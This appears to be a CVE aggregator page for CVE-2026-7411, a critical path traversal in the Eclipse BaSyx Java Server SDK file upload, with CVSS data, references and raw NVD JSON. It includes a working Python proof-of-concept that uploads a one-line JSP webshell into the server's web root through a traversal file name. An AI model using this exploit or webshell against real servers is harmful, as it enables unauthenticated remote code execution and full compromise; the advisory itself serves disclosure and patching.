CVE-2026-7411

Description

In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload operation, an attacker can bypass intended storage boundaries and write arbitrary files to any location on the host filesystem accessible by the Java process. This can lead to Remote Code Execution (RCE) and complete system compromise.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Eclipse BaSyx Java Server SDK < 2.0.0-milestone-10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://target-ip:port/submodels/file-upload"

# Malicious file content (e.g., JSP Webshell)
webshell_content = '<%@ page import="java.io.*" %><% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'

# Exploit payload using path traversal
files = {
    'file': ('../../webapps/ROOT/shell.jsp', webshell_content, 'application/octet-stream')
}

data = {
    'fileName': '../../webapps/ROOT/shell.jsp' # The vulnerable parameter
}

try:
    response = requests.post(target_url, files=files, data=data)
    if response.status_code == 200:
        print("[+] Exploit successful! File uploaded.")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7411
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7411
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7411/
[4] VulDB https://vuldb.com/cve/CVE-2026-7411
[5] https://gitlab.eclipse.org/security/cve-assignment/-/issues/102
[6] https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423
[7] https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7411", "sourceIdentifier": "[email protected]", "published": "2026-05-05T16:16:18.360", "lastModified": "2026-05-06T16:16:12.380", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload operation, an attacker can bypass intended storage boundaries and write arbitrary files to any location on the host filesystem accessible by the Java process. This can lead to Remote Code Execution (RCE) and complete system compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/102", "source": "[email protected]"}, {"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423", "source": "[email protected]"}, {"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}